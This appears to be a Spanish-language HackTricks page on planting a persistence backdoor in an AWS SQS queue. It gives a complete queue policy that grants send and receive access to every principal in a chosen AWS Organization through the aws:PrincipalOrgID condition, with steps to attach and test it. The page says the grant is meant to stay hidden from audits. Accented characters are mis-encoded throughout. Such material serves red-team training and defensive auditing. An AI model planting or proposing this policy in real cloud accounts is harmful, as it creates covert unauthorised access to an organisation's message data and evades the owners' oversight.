AWS - SQS OrgID Policy Backdoor

Tip

Aprende y practica Hacking en AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprende y practica Hacking en GCP: HackTricks Training GCP Red Team Expert (GRTE) Aprende y practica Hacking en Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Apoya a HackTricks

Abusar de la resource policy de una cola SQS para conceder silenciosamente Send, Receive y ChangeMessageVisibility a cualquier principal que pertenezca a una AWS Organization objetivo, usando la condici贸n aws:PrincipalOrgID. Esto crea una ruta oculta con alcance de organizaci贸n (org-scoped) que a menudo evade controles que solo buscan ARNs de cuentas o roles expl铆citos o star principals.

Backdoor policy (attach to the SQS queue policy)

{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "OrgScopedBackdoor",
"Effect": "Allow",
"Principal": "*",
"Action": [
"sqs:ReceiveMessage",
"sqs:SendMessage",
"sqs:ChangeMessageVisibility",
"sqs:GetQueueAttributes"
],
"Resource": "arn:aws:sqs:REGION:ACCOUNT_ID:QUEUE_NAME",
"Condition": {
"StringEquals": { "aws:PrincipalOrgID": "o-xxxxxxxxxx" }
}
}
]
}

Pasos

  • Obt茅n el Organization ID usando la API de AWS Organizations.
  • Obt茅n el ARN de la cola SQS y configura la pol铆tica de la cola incluyendo la declaraci贸n anterior.
  • Desde cualquier principal que pertenezca a esa Organization, env铆a y recibe un mensaje en la cola para validar el acceso.

Impacto

  • Acceso oculto a nivel de Organization para leer y escribir mensajes SQS desde cualquier cuenta en la AWS Organization especificada.

Tip

Aprende y practica Hacking en AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprende y practica Hacking en GCP: HackTricks Training GCP Red Team Expert (GRTE) Aprende y practica Hacking en Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Apoya a HackTricks